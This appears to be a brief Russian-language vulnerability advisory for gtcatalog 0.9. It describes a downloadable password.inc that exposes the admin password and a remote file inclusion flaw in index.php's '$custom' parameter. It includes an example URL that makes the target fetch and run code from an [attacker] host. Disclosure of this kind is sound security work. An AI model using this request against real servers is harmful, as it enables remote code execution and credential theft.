Уязвимость включения файла обнаружена в
gtcatalog. Удаленный пользователь может выполнить произвольные команды на уязвимом сервере. Также удаленный пользователь может раскрыть пароль администратора системы.
Frog-m@n сообщил, что удаленный пользователь может загрузить'password.inc файл, который содержит пароль администратора системы в $$globalpw переменной.
Также сообщается, что сценарий index.php включает *.custom.inc файл, используя переменную '$custom', но не проверяет правильность включаемого файла. Удаленный пользователь может определить удаленное местоположение для *.custom.inc файла, который будет включен и выполнен целевым сервером. Пример:
http://[target]/index.php?function=custom&custom=http://[attacker]/1
где http://[attacker]/1.custom.inc
Уязвимость обнаружена в 'gtcatalog' 0.9.
